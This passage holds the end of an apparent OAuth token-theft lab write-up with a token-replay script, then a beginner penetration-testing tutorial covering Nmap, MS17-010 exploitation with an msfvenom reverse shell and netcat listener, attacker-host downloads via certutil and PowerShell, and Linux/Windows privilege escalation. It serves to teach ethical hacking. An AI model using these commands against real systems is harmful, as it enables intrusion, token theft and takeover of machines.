Click the back button in your browser to return to the exploit server and click the button “Deliver exploit to victim”. Click
the button “Access log” again and look for a GET request like that we saw one step earlier but this time, there is a different
IP address. In this request, extract the value of the parameter access_token but be careful that you only extract the value
and not the URL encoded characters which enclose this value.


Figure 19: Access Token

Switch to Burp Proxy, open the “HTTP history” tab and look for a GET request to the endpoint /me. In the “Request” section, right click and select the option “Send to Repeater”.

Figure 20: Send Request To Repeater

Switch to Burp Repeater and look in the request section for the authorization header. Replace the value of the header
behind the word Bearer with the access token that you copied from the access log. Your authorization header should look
like Authorization: Bearer <YOUR-COPIED-ACCESS-TOKEN>.

Figure 21: Authorization Header

If you send the request to the blog website, your response will contain the JSON data from the administrator user.
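The following shell helper, added here and not part of the lab or the article, automates the extraction step above: it takes one line of the exploit server's access log, decodes the characters that encodeURIComponent() escaped, and prints only the access_token value, which can then be sent as a Bearer token to the /me endpoint on the host that served the original /me request. The log line format, the host name and the token value in the sample are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example, not part of the lab or the article. Pulls the access token
# out of one exploit-server access-log line and replays it against /me.
# The log line, host name and token below are constructed for illustration.

# Undo the escaping that encodeURIComponent() applied to the leaked URL.
# Only the characters that matter for locating the token are decoded.
urldecode_path() {
    printf '%s' "$1" | sed 's/%2F/\//g; s/%23/#/g; s/%3D/=/g; s/%26/\&/g; s/%3A/:/g'
}

# Print just the access_token value from one access-log line.
extract_token() {
    # The request path is the field that starts with "/" and names the
    # comment form (the page whose URL was leaked by postMessage()).
    path=$(printf '%s' "$1" |
        awk '{ for (i = 1; i <= NF; i++) if ($i ~ /^\/.*comment-form/) print $i }')
    decoded=$(urldecode_path "$path")
    case "$decoded" in
        *access_token=*) ;;
        *) echo "no access_token in line" >&2; return 1 ;;
    esac
    token=${decoded#*access_token=}   # drop everything up to the parameter
    token=${token%%&*}                # drop the parameters that follow it
    printf '%s\n' "$token"
}

# Replay the token as a Bearer token against /me (needs network access,
# so it is not exercised offline).
whoami_with_token() {
    curl -s -H "Authorization: Bearer $2" "https://$1/me"
}

# Constructed sample: the token sits in the URL fragment (after #), which the
# browser never sends to a server but which window.location.href contains.
SAMPLE_LOG_LINE='10.0.3.1 2021-01-01 12:00:00 +0000 "GET /https%3A%2F%2FYOUR-LAB-ID.web-security-academy.net%2Fpost%2Fcomment%2Fcomment-form%23access_token%3DSTOLEN_TOKEN_VALUE%26expires_in%3D3600%26token_type%3DBearer%26scope%3Dopenid%2520profile%2520email HTTP/1.1" 404 "Mozilla/5.0"'

# Usage: ./token.sh ACCESS_LOG_FILE OAUTH-SERVER-HOST
if [ $# -ge 2 ]; then
    grep 'comment-form' "$1" | while IFS= read -r line; do
        token=$(extract_token "$line") && whoami_with_token "$2" "$token"
    done
fi
```

Cutting at the first & after access_token= is what keeps the %26 that encloses the value in the raw log out of the token; pasting the still-encoded value into the Authorization header is the mistake the step above warns about.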


Figure 22: JSON Data

To solve the lab, copy the value of the apikey and switch to your browser. In the upper middle of the blog website, you see a button named “Submit solution”.

Figure 23: Submit Solution

If you click on it an input field appears, and you can paste the value from the apikey from your Burp Repeater. Now, you
can hit enter and you solved the lab. If you did not see the lab solved banner, refresh your browser and everything should be
fine.

Figure 24: Lab Solved


CONCLUSION

The expert labs of the Web Security Academy are very difficult and, in most cases, understanding the topic alone is not enough to solve them. This lab requires only a basic understanding of HTML and JavaScript, as I explained in the introduction. Of course, it is hard to decide what is basic and what is advanced knowledge, but as a Bug Bounty Hunter or a Pentester it is unavoidable to have an understanding of postMessage() and the Fetch API. The difficulty of this lab was the identification of a second vulnerability, and the vulnerability identified was directory traversal. As you can see, you should have worked on the topic Directory Traversal so that you can apply that knowledge here. If you followed the learning path, identifying this vulnerability was not easy, but it was not unnecessarily difficult either. Sometimes, it is also helpful to work through the labs in the order they appear in the topic, because the solution of the previous lab can be a good start for solving the next one. The Web Security Academy is one of the best free resources for web security on the Internet, and you should work through the whole learning path once, and then selectively as necessary.

References

1. Lab site: https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page

2. Configure Burp Suite and Browser: https://portswigger.net/burp/documentation/desktop/getting-started/proxy-setup/browser

3. Nonce vs state: https://stackoverflow.com/questions/46844285/difference-between-oauth-2-0-state-and-openid-nonce-parameter-why-state-cou

4. What is directory traversal: https://portswigger.net/web-security/file-path-traversal

5. Iframe: https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe

6. Window.postMessage(): https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage

7. Location: https://developer.mozilla.org/en-US/docs/Web/API/Location

HACKING TECHNIQUES FOR BEGINNERS: HOW TO GET THE CONTROL OF A SYSTEM

VERÓNICA BERENGUER GARRIDO
I'm Verónica Berenguer Garrido, graduate in telecommunications engineering and specialized in the branch of cybersecurity by the University of Seville. Nowadays, I work as an offensive security researcher in a Red Team, which allows me to analyze all kinds of vulnerabilities and exploit them. This helps me protect systems and networks from threats and malware. My passion is to learn more every day and research new technologies that allow me to improve in my work. In short, I love what I do.

167
Hacking Techniques For Beginners: How To Get The Control Of A System

When we hear the word “hacker” we usually imagine a person that wears a black hooded sweatshirt doing illegal activities
in a sinister terminal. However, this is not always the case because there is a big difference between cybercriminal and
hacker.

A hacker is someone who has knowledge of hacking techniques. Within that group, we can differentiate between ethical hackers and cybercriminals. Both have the same hacking knowledge; however, the former use it to find vulnerabilities and report them to improve systems and applications, while the latter intend to obtain some benefit, such as economic compensation, extortion, etc.

In this article, we are going to learn basic hacking processes and techniques to be an ethical hacker, from port scanning to
privilege escalation. Finally, we will see with a real example how we can hack a remote machine applying these techniques.

WHAT WILL YOU LEARN?

In this article, we will introduce the world of hacking, teaching all the steps to get control of a system.

The topics addressed are as follows:

Port Scanning

Vulnerability Scanning

Exploitation Tasks

Privilege Escalation

WHAT SHOULD YOU KNOW?

In this article, we will explain everything step by step, but the following prior knowledge will be necessary:

Basic Scripting (Python, C, Bash, Perl, PHP, etc.)

Basic Networking

You just need to have fun reading, learning and researching.

INTRODUCTION

Nowadays, any person interested in cybersecurity is called a hacker, but really the value of a hacker isn’t just to launch
automatic applications to find and exploit vulnerabilities. The real value of a hacker is the knowledge of techniques or basic
tools or commands to research vulnerabilities and exploit them in systems and applications to improve them. The
automatic tools can help or complement the investigation, but wisdom is the most precious treasure of an ethical hacker.


With this article, we hope to encourage beginners and teach them basic techniques to start in ethical hacking. We will see how, with a few commands, patience and calm, we can compromise a server in four phases, explained in the sections below. To apply this knowledge, we are going to hack a machine using a Kali Linux distribution.

Before starting, I would like to remind you that you must have the permission of the organization or entity that owns a system before hacking it. Normally, a company pays for a pentest of its assets to patch the vulnerabilities before a real attacker exploits them. So, in this article, pretend you are a pentester who has to perform a security test for an organization. Let's go!

PORT SCANNING

The first step, called port scanning, is the process of checking for open TCP or UDP ports on a remote machine to find
services, technologies and versions.

NMAP

One of the most popular and complete tools for port scanning is Nmap (Network Mapper). Nmap is a free and open source utility for security auditing and network discovery, which gives us a large amount of information about the computers, like open and filtered ports, which hosts are up in a network, traceroute, operating system, services and versions by banner grabbing, and dozens of other characteristics. For the analysis, you can give Nmap a subnet, a single IP or a domain, as we will see below.

Besides, Nmap allows us to write and execute scripts through the Nmap Scripting Engine (NSE) in order to detect or exploit vulnerabilities, perform enumeration tasks, detect backdoors, discover networks, etc.

Nmap has a very long list of options. Below, we are going to show the most efficient commands to obtain the necessary
information for our pentesting:

● -v

o This option increases verbosity, showing the progress of the scan while it runs (only if you want to follow it).

● -A

o This option, named “aggressive scan options”, enables OS detection (-O), version scanning (-sV), script
scanning (-sC) and traceroute (--traceroute).

● -p

o This option is used to indicate the scanning ports. By default, Nmap scans the 1000 most popular ports on a
given machine for UDP or TCP. There are three options:

▪ If you want to scan all ports you can include the following option:


● -p-

● -p 0-65535

▪ If you want to scan specific ports you can include the following option, for example:

● -p 443,8451,80,25

▪ If you want to scan default ports, you must not include the option.

● -sU

o This option is used to scan UDP ports. If you don’t specify this, Nmap will scan TCP ports.

● -sT

o This option performs a TCP connect scan, which completes the full three-way handshake. When run as root, Nmap defaults to the stealthier SYN scan (-sS), so -sT is only needed when you cannot send raw packets or want full connections.

● -f

o This option fragments the probe packets, which can make the scan harder for some firewalls and intrusion detection systems to recognise. It is not a guarantee: devices that reassemble fragments before inspection will still see the full packets.

● -Pn

o This option is used to avoid ping. It is a good option because there are machines that filter or block ICMP
requests and may seem down to a ping sweep.

● --script

o This option is used to run NSE scripts, for example --script vuln or --script=default. The scripts are normally found in the /usr/share/nmap/scripts directory.

● -oN

o This option saves the results as normal, human-readable text in a file.

● -oG

o This option saves the results in greppable format, one line per host, which is convenient for processing with grep, cut or awk.

● -oX

o This option saves the results in an XML file.

In this article, we are going to apply what we have learned in a real example of hacking a machine, following the chain
from port scanning through to privilege escalation.


The first step in hacking a network is looking for active hosts, so we use Nmap to obtain this information and save it
to a file. Thanks to the ‘grep’ and ‘cut’ commands, we keep only the list of IPs in the file.

nmap -v -sn -n 192.168.1.0/24 | grep -v down | grep report | cut -d" " -f5 > ips-192.168.1.0-up.txt

Once we have the list of machines that are up, the second step is to scan their ports. We can do this with a ‘for’ loop
typed directly into the terminal.

for i in $(cat ips-192.168.1.0-up.txt); do nmap -v -A -p- $i -oN ip-$i-tcp.txt; done

However, in this article we perform the example with only one machine. The first step is TCP and UDP port scanning of
the target machine, executing the following Nmap commands (each scan is written to its own XML file, since -oX
overwrites an existing file unless --append-output is given).

nmap -v -A -p- -Pn 192.168.1.40 -oX 192.168.1.40-tcp.xml

nmap -v -A -sU -p- -Pn 192.168.1.40 -oX 192.168.1.40-udp.xml

1.1 Nmap port scanning


1.2 Nmap port scanning

The image shows the list of open TCP ports, their services and versions, and the output of some NSE scripts related to
the services found. In the next section, we continue investigating these services to find related vulnerabilities.
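To make the scan output usable beyond a screenshot, here is an added example (not code from the article) that parses Nmap’s -oX output with Python’s standard library, extracts the open ports with their service and product strings, and builds the value for -p so that a follow-up --script vuln scan targets only the ports found open. The XML document embedded in it is a constructed, abridged sample in the -oX format, not the real output of the scan above, and the function and class names are my own.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed, abridged sample in Nmap's -oX format (not real scan data).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -v -A -p- -Pn 192.168.1.40 -oX 192.168.1.40-tcp.xml">
  <host>
    <status state="up" reason="user-set"/>
    <address addr="192.168.1.40" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="139">
        <state state="open" reason="syn-ack"/>
        <service name="netbios-ssn" product="Microsoft Windows netbios-ssn" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="filtered" reason="no-response"/>
        <service name="ms-wbt-server" method="table" conf="3"/>
      </port>
      <port protocol="tcp" portid="49152">
        <state state="open" reason="syn-ack"/>
        <service name="msrpc" product="Microsoft Windows RPC" method="probed" conf="10"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


@dataclass(frozen=True)
class OpenPort:
    host: str
    protocol: str
    port: int
    service: str
    product: str
    version: str


def parse_open_ports(xml_text):
    """Return an OpenPort record for every port whose <state> is 'open'."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed / filtered ports are not listed
            svc = port.find("service")
            attr = svc.get if svc is not None else (lambda key, default="": default)
            found.append(OpenPort(host=addr,
                                  protocol=port.get("protocol"),
                                  port=int(port.get("portid")),
                                  service=attr("name", ""),
                                  product=attr("product", ""),
                                  version=attr("version", "")))
    return found


def open_port_list(xml_text):
    """Sorted list of open port numbers for the host(s) in the document."""
    return sorted(p.port for p in parse_open_ports(xml_text))


def nmap_port_arg(xml_text):
    """Value for Nmap's -p option, so the follow-up --script vuln scan targets only open ports."""
    return ",".join(str(p) for p in open_port_list(xml_text))


if __name__ == "__main__":
    for p in parse_open_ports(SAMPLE_NMAP_XML):
        print(f"{p.host} {p.protocol}/{p.port:<5} {p.service:<14} {p.product} {p.version}".rstrip())
    print("nmap -v -p", nmap_port_arg(SAMPLE_NMAP_XML), "--script vuln 192.168.1.40")
```

Replace SAMPLE_NMAP_XML with the contents of the XML file written by -oX to run it against a real scan; the filtered port 3389 in the sample is there to show that only ports in state "open" make it into the -p list.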

Apart from Nmap, there are shell scripts based on Nmap such as nmapAutomator or autoRecon. Both are Linux shell scripts
that automate Nmap scanning tasks. They include different scan modes, including scanning for vulnerabilities, and
integrate additional tools to improve and complete the analysis according to the services found. For example, if it detects
web services, tools related to it are launched, such as Gobuster or Nikto. Both nmapAutomator and autoRecon are easy to
install and use, so I encourage you to use them.

VULNERABILITY SCANNING

Once you have discovered services, technologies and versions running on a machine, the next step is to find related
vulnerabilities, known as vulnerability scanning.

Vulnerability scanning is the process of discovering and identifying vulnerabilities in a network. The CVE (Common
Vulnerabilities and Exposures) system catalogues publicly known vulnerabilities that affect a system’s security, assigning
a unique identifier to each vulnerability. The main CVE repository is at https://cve.mitre.org/.

There are a lot of automated tools that help the pentester in this phase, but most of them are paid or their free
versions are quite limited. However, there are some powerful free tools that are helpful in this phase, listed
below:

Nessus

This is a remote security scanning tool developed by Tenable for analysing vulnerabilities in subnets, single IPs or web
applications, and it is free. Some of its characteristics are:

• Multiplatform

• Supports the Common Vulnerability Scoring System (CVSS) and its v2/v3 versions.

• It limits the number of IPs scanned on internal networks, but has no limit for public IPs.

• It is a good option for system analysis.

OpenVAS

This tool is an open-source vulnerability scanner that can perform authenticated and unauthenticated scans utilizing more
than 80,000 vulnerability tests and is free. It is similar to Nessus.

OWASP Zed Attack Proxy (ZAP)

This free tool is an open-source web application vulnerability scanner with proxy functionality. It is similar to Burp
Suite (a commercial tool) and its checks are based on the OWASP Top 10 of common web security vulnerabilities. Some of
its characteristics are:

• Multiplatform

• Passive and active analysis

• Fuzzing Mode

• Spidering Mode

• Debugging

However, in this lesson, we are going to learn how to get vulnerabilities without automatic tools. For that, our greatest ally
is Nmap.

As we saw previously, Nmap can execute NSE scripts dedicated to enumeration tasks or to detecting and exploiting
vulnerabilities. To do this, Nmap first identifies services, technologies and versions. With that information, Nmap is
able to search for CVEs related to the version found and show them to the pentester.

Finding vulnerabilities with NSE Scripts

By default, Nmap ships a script category named vuln for searching for vulnerabilities. However, the most popular
vulnerability-detection NSE scripts are vulscan and vulners, which detect relevant CVE information for hosts. To install
and use them, follow the steps in the linked repositories and remember that NSE scripts normally live in the
/usr/share/nmap/scripts directory.


Examples of searching for vulnerabilities with NSE scripts are shown below:

nmap -v -A --script vuln -p- -Pn 192.168.1.40

nmap -v -A --script vulners -p- -Pn 192.168.1.40

nmap -v -A --script vulscan -p- -Pn 192.168.1.40

Besides the NSE scripts for vulnerability scanning, there are many NSE scripts dedicated to particular services, such as
HTTP, SNMP, SMTP, FTP, etc., for enumeration, scanning and exploiting vulnerabilities. I encourage you to discover the
most interesting ones and use them.

2 Abstract of NSE scripts

On our target machine, we use the vulnerability-scanning NSE scripts to find vulnerabilities. To do this, we execute
the following Nmap command, focusing on the ports found in the previous section.

nmap -v -p 139,145,445,49152,49153,49154,49155,49156,49157 --script vuln 192.168.1.40


3 vuln nmap script

We find a critical SMB vulnerability identified as MS17-010, which allows remote code execution in Microsoft SMBv1.
In the next section, we will exploit this vulnerability to take control of the remote target machine.

EXPLOITATION TASKS

Once we have identified the vulnerabilities in the services found on a target machine, the next step is to exploit them
to get access to it. To do this, the pentester has to search for exploits related to the vulnerabilities found. An
exploit is, basically, a piece of code written to take advantage of a particular vulnerability.

This is the most important phase because you must perform a full investigation to discover the effective exploitation
method to gain access to a machine. You must be very patient and keep calm because this could take a very long time.

Searching exploits

One of the most popular and reliable repositories for public exploit code is Exploit Database. These exploits are uploaded
under close examination, and they are not published if deemed fake.

For searching, we have two options:

• Manual

For this option, we can visit https://www.exploit-db.com/ and search exploits related to the CVE found in the
vulnerability scanning phase.

• Automatic

For this option, Kali Linux ships with the tool named searchsploit. This is a command-line search tool for the
Exploit-DB repository that keeps a local copy of the available exploits on the machine where you run the analysis,
so it is important to update this copy frequently. You can visit https://www.exploit-db.com/searchsploit to
install it and learn its more advanced usage.

The most basic and efficient options of searchsploit are shown below, though I encourage you to discover all the
options for this tool with --help:

o Updating searchsploit:

searchsploit -u

o Search exploits:

searchsploit <ServiceName>

o See the description of an exploit:

searchsploit -x <ExploitName>

o Take a copy of an exploit to the current working directory:

searchsploit -m <ExploitName>

o Checking all exploit results against Nmap’s XML output, using the service version.

▪ First, we run the scan with Nmap. The output must include service versions (option -A):

nmap -A <targetMachineIP> -oX ResultsNmap.xml

▪ Secondly, we can obtain exploits automatically using the XML file with Nmap’s results as input. searchsploit
reads the services and versions from the document and searches for related exploits.

searchsploit --nmap ResultsNmap.xml

Never run an exploit without first examining its code and understanding how it works. So, in this phase you need basic
scripting knowledge in languages such as Python, Bash, Ruby, Perl, C or C++ to customise and fix exploits.

If you are not familiar with scripting practice and you are beginning in ethical hacking, I recommend you begin with
Metasploit Framework.

Metasploit Framework is an advanced open-source platform, written in Ruby, for developing, testing and using exploit
code. The Kali Linux distribution includes this framework; on another platform, follow the installation steps in this
guide: https://github.com/rapid7/metasploit-framework.


Metasploit includes many auxiliary modules that provide functionality such as information gathering, port scanning,
protocol enumeration, fuzzing, sniffing, etc. Apart from that, it also includes a large repository of exploits. With
this tool, you can compromise a system with a few simple commands, configuring the exploit without inspecting or
understanding its code.

The intention of this article is not to cover automated tools, so we will not focus on this application. However, I
encourage you to learn more about this indispensable tool for any ethical hacker through this great tutorial:
https://www.offensive-security.com/metasploit-unleashed/.

On our hacking machine, the next step is to search for exploits related to the vulnerabilities found, so we use the
Exploit-DB web repository and its command-line tool searchsploit.

Exploit-DB

We find exploits related to the CVE ID. We can review them and download them for use.

4.1 Exploit-DB Search

4.2 Exploit-DB Search


Searchsploit

We find exploits related to the MS17-010 vulnerability ID and take a copy into our current directory with the -m option.

5 Searchsploit

To gain access to the target machine, we have to review the script to understand how it works and modify the necessary
options. Normally, every script has a description at the beginning explaining its modules and the options to
configure.

Creating a payload

A payload is the piece of code carried by the exploit that runs on the target once the vulnerability has been triggered,
giving us access to the machine. The most popular tool to create payloads is msfvenom. To understand the creation of
payloads better, I encourage you to investigate this tool at https://www.offensive-security.com/metasploit-unleashed/msfvenom/.

For this example, we use it to create a reverse TCP shell payload as a Windows executable.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.248.140 LPORT=4444 -f exe -o eternal-blue.exe

The options are explained below:

• -p <payload>

• -f <output format>

• LHOST=<attacker_IP>

• LPORT=<port the attacker listens on>

• -o <output file name>

6 Msfvenom payload creation

The payload has been generated as an executable that will run on the target machine when we launch our exploit. It will
connect back to our hacking machine (192.168.248.140) on port 4444, giving us a reverse shell on the victim
machine.

Running the exploit

Next, we set the path of the payload in the exploit’s configuration.

7 Configuring the exploit

As the target machine will try to connect with our hacking machine through the port 4444, we will listen in that port.

nc -nvlp <LISTEN_PORT>

8 netcat listening port

Finally, we run the exploit and obtain a remote session on the target machine.


9 Exploit running

10 Connection successful with the target machine

The general idea of this section is that, once we have found interesting exploits, we execute them to try to get access
to the system. Be patient and keep calm: it is possible that the vulnerabilities found have been patched and their
exploits do not work, so you will have to keep looking for and testing exploits.

PRIVILEGE ESCALATION

Once you have successfully exploited a vulnerability and have access to a remote machine, you enter the last phase:
privilege escalation.

Privilege escalation is the process of increasing the level of access to a machine or network; the objective, therefore,
is to obtain the root user. In this section, we will see interesting tips and methods, acquired through experience, for
finding ways to elevate privileges on Windows and Linux machines.

File Transfer Method

One of the first steps after gaining a remote shell is to upload additional tools to the remote machine to escalate
privileges. However, we are limited to the tools available on the target for receiving them. Below we will learn some
methods to transfer files to the target machine.


First, on our hacking machine we start an HTTP server on a port, for example port 80, though you can use any port you
want. We can use Python for this, in our case Python 2.7. The following command is run in the directory where the files
you want to transfer are stored.

python2.7 -m SimpleHTTPServer 80

You can also use Apache if you prefer. To do this, we put the files we want to transfer into /var/www/html and then
start the Apache service.

service apache2 start

Once we have an HTTP service listening on a port of our hacking machine, we can download the file onto the victim
machine with one of the following procedures.

1. Advanced Techniques

• Linux Victim Machine

Next, from the victim machine, we first check whether it has wget or curl installed. If the following command prints
the path of a program, that tool exists.

which wget; which curl

If the target has wget or curl installed on the machine, we can use one of these tools to download the file. First we
change into a directory that permits writing, such as /tmp. The commands are below.

• Wget

wget http://<ATTACKER_MACHINE>:<PORT>/<FILE_PATH>

• Curl

curl -o <FILENAME> http://<ATTACKER_MACHINE>:<PORT>/<FILE_PATH>

If it is an executable file, we check that it has execute permission on the target machine and grant it (chmod +x) if
necessary.

• Windows Victim Machine

If the target machine is a Windows distribution, we can use certutil.exe to download the file from cmd or powershell:


• cmd

certutil.exe -urlcache -split -f "http://<ATTACKER_IP>:<PORT>/<FILE_PATH>" <FILENAME>

• PowerShell:

certutil -urlcache -split -f "http://<ATTACKER_IP>:<PORT>/<FILE_PATH>" <FILENAME>

If certutil is not available on the target machine, we can try wget (in PowerShell, an alias of Invoke-WebRequest) to download the file from cmd or PowerShell:

• cmd

powershell.exe wget http://<ATTACKER_IP>:<PORT>/<FILE_PATH> -outfile "<FILENAME>"

• PowerShell

wget http://<ATTACKER_IP>:<PORT>/<FILE_PATH> -outfile "<FILENAME>"

If none of the previous tools is available on the target machine, we can try IEX with the .NET WebClient class to
download the file from cmd or PowerShell:

• cmd

powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('http://<ATTACKER_IP>:<PORT>/<FILE_PATH>', '<WINDOWS_FILE_PATH_TO_SAVE_THE_FILE>')"

• PowerShell:

IEX(new-object System.Net.WebClient).DownloadFile('http://<ATTACKER_IP>:<PORT>/<FILE_PATH>', '<WINDOWS_FILE_PATH_TO_SAVE_THE_FILE>')

2. Netcat

Another method to transfer files is Netcat. This is a tool capable of establishing UDP or TCP connections between
hosts.

To do this, we first check that the target machine has netcat installed, and then we run the following command on our
hacking machine. Note the direction of the redirections: the listener writes whatever it receives to <FILENAME>, so
with the commands as shown the file travels from the machine running `nc ... < <FILENAME>` to the listener. To push a
file onto the victim instead, run the listener (with `> <FILENAME>`) on the victim and the sending command (with
`< <FILENAME>`) on the hacking machine.

nc -nlvp <LISTEN_PORT> > <FILENAME>

• Linux Victim Machine

Once the listener is running, we run the following command on the victim machine to transfer the file.


nc <ATTACKER_IP> <LISTEN_PORT> -w 3 < <FILENAME>

• Windows Victim Machine

If the victim machine runs Windows, we run the following command on it to transfer the
file.

nc.exe <ATTACKER_IP> <LISTEN_PORT> -w 3 < <FILENAME>

Apart from these methods, there are many other ways to transfer files, such as the FTP protocol. I encourage you to
investigate FTP tools such as tftp or pureftp and practise with them.

Having seen some file transfer methods, we now look for ways to elevate privileges on Windows and Linux
machines.

Linux Privilege Escalation Methods

Imagine you have access to a remote machine as a user without root privileges. Below we will see, in order, the steps
to follow to escalate privileges on a Linux distribution.

1. Check the allowed commands for the invoking user on the current host

First, we check with the sudo tool which commands the invoking user can run as if it were another user. To do
this, we launch the following command.

sudo -l

This command lists the allowed commands for my user, as we can see below. The last line shows that the user I am
running as, in this case www-data, can run any command as the user scriptmanager without providing a
password.

11 Checking user permissions

If we execute one of the following commands, we will become scriptmanager user.

sudo -u scriptmanager bash -i


sudo -i -u scriptmanager

The same can happen with a superuser such as root. In the next example, we can see that the user named notch can
run all commands as any user.

12 Checking user permissions

Next, we can look at the /etc/passwd file to find superuser accounts such as root, and execute the following command to
become the root user:

sudo -u root bash -i

To corroborate this, we can launch whoami or id commands to check the running user.

13 whoami

Another example is the following, where we can see that we can launch Perl applications as root without any
password.

14 Checking user permissions

In this case, we can’t run an arbitrary command directly, but with a little creativity we can still become the root
user, as we can see below.

15 Get root user


2. Check setuid bit


If it is not possible to escalate privilege with the previous method, we are going to check the setuid bit.

The setuid bit makes a file execute with its owner’s privileges. When this bit is set, the owner’s execute ‘x’ in the
permission string is shown as ‘s’. Therefore, if the owner of an executable file is root and the setuid bit is set, we
can become the root user temporarily.

First, we locate the files that have the setuid bit set with the following command.

find / -perm -u=s -type f 2>/dev/null

16 Files with setuid permissions

Next, we look for executable files, like the one on the first line. Inspecting this file, we can confirm that the setuid
bit is set on an executable owned by root.

17 Corroborating setuid bit

Our user belongs to the “others” permission group, so we can execute this file.

18 “Other” permission group

Finally we execute this file and, while the execution is active, we will be root.

19 Running file with setuid bit active


3. Bash Scripts Linux Exploit Suggester

If it is not possible to escalate privilege with the previous methods, we are going to see how to get it through Bash
scripts.

There are Bash scripts dedicated to keeping track of vulnerabilities and suggesting possible exploits to use to gain
‘root‘ on a legitimate penetration test.

The most important Bash scripts are shown below.

• Linux exploit suggester

• LinEnum

• LinuxPrivChecker

In every case, you download the Bash script to the hacking machine and transfer it to the victim machine, as we
learned previously.

Once the Bash script is in the victim machine, the first step is to execute it. The output will show a list of possible
vulnerabilities and exploits to elevate privileges. This information is obtained after checking the characteristics of the
machine, as we can see in the image below. This is an example of the script linux-exploit-suggester execution.

20 Linux Exploit Suggester Execution

Our work from this point is to try exploits to obtain elevated privileges. Furthermore, as we can see in the last
image, the URLs of the exploits are shown, so you only have to download the exploits to the victim machine and try them.

Our target machine runs Windows, so in the next section we will see an example of how to escalate privileges on a
remote Windows machine.


Windows Privilege Escalation Methods

In this section, we will learn some methods to escalate privilege in Windows machines.

1. Windows Exploit Suggester

This is a Python script that compares a target’s patch level against the Microsoft vulnerability database in
order to detect potentially missing patches on the target. To use it, download the script to the hacking
machine and follow the steps described on its official GitHub page. The tool checks the target machine’s system
information and finds associated vulnerabilities.

To use this tool, it requires the ‘systeminfo’ command output from the Windows victim machine in order to compare
it with the Microsoft security bulletin database and determine the patch level of the target host. Below we can see an
example of ‘systeminfo’ output in a Windows host. This output must be copied into a txt file, named as
‘systeminfo.txt’, for example.

21 Systeminfo output

Once we have saved that information into a file, we run ‘windows-exploit-suggester.py’ on our hacking
machine. The database should be updated frequently, as we can see below.

22 windows-exploit-suggester updating

To run this tool we can execute the following command.



python2.7 windows-exploit-suggester.py --database 2021-03-15-mssb.xls --systeminfo systeminfo.txt | grep Privi

The output will show a list of possible vulnerabilities and exploits to elevate privileges, where [E] shows exploits
located into exploit-db and [M] indicates Metasploit exploits. This information is obtained after checking and
analyzing the characteristics of the machine through the txt file.

23 windows-exploit-suggester running

Our work from this point will be to try exploits to obtain elevation of privileges. To do this, we download and execute
in the victim machine an exploit from exploit-db.

powershell.exe -c "(new-object System.Net.WebClient).DownloadFile('https://www.exploit-db.com/download/41020', 'c:\Users\Public\Downloads\41020.exe')"

24 windows-exploit-suggester running

To corroborate the privilege elevation, we can run the ‘whoami’ command.

25 whoami
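The comparison Windows-Exploit-Suggester performs, parse the hotfix list out of systeminfo output and check it against a bulletin table, is simple enough to show in full. The following Python is an added example, neither the article’s nor the tool’s own code. Both the systeminfo text and the bulletin table are constructed, abridged samples: the real tool reads the Microsoft bulletin spreadsheet, and KB numbers must come from that database, not from this table (MS17-010 is the vulnerability found earlier in the article; the two MSXX-EXAMPLE rows are placeholders that exercise the “already installed” and “other product” branches). Function names are my own.

```python
import re

# Constructed, abridged `systeminfo` output (the real command prints many more fields).
SAMPLE_SYSTEMINFO = """Host Name:                 WIN7-TARGET
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2533552
                           [02]: KB3020369
                           [03]: KB3125574
"""

# Constructed stand-in for the bulletin database (the tool's --database .xls). The MS17-010 row
# uses the Windows 7 security-only update for that bulletin; the MSXX-EXAMPLE rows are placeholders.
# Take real mappings from the downloaded database, never from this table.
SAMPLE_BULLETINS = [
    {"bulletin": "MS17-010", "kb": "KB4012212", "product": "Windows 7",
     "severity": "Critical", "exploit": "M"},
    {"bulletin": "MSXX-EXAMPLE-A", "kb": "KB3125574", "product": "Windows 7",
     "severity": "Important", "exploit": "E"},
    {"bulletin": "MSXX-EXAMPLE-B", "kb": "KB9999999", "product": "Windows 10",
     "severity": "Critical", "exploit": ""},
]


def parse_systeminfo(text):
    """Pull the fields the comparison needs out of `systeminfo` output."""
    def field(name):
        m = re.search(r"^" + re.escape(name) + r":\s*(.+?)\s*$", text, re.M)
        return m.group(1) if m else ""
    return {
        "os_name": field("OS Name"),
        "os_version": field("OS Version"),
        "arch": field("System Type"),
        # Hotfix lines look like "[01]: KB2533552"; the KB numbers are what bulletins key on.
        "hotfixes": set(re.findall(r"\[\d+\]:\s*(KB\d+)", text)),
    }


def missing_patches(info, bulletins):
    """Bulletins that apply to this OS whose KB is not in the installed hotfix list."""
    return [b for b in bulletins
            if b["product"] in info["os_name"] and b["kb"] not in info["hotfixes"]]


def report_lines(missing):
    """Render results in the [E]/[M] style the article describes for the tool's output."""
    lines = []
    for b in missing:
        tag = f"[{b['exploit']}]" if b["exploit"] else "[ ]"
        lines.append(f"{tag} {b['bulletin']}: {b['severity']} - missing {b['kb']}")
    return lines


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(f"{info['os_name']} ({info['arch']}), {len(info['hotfixes'])} hotfixes installed")
    for line in report_lines(missing_patches(info, SAMPLE_BULLETINS)):
        print(line)
```

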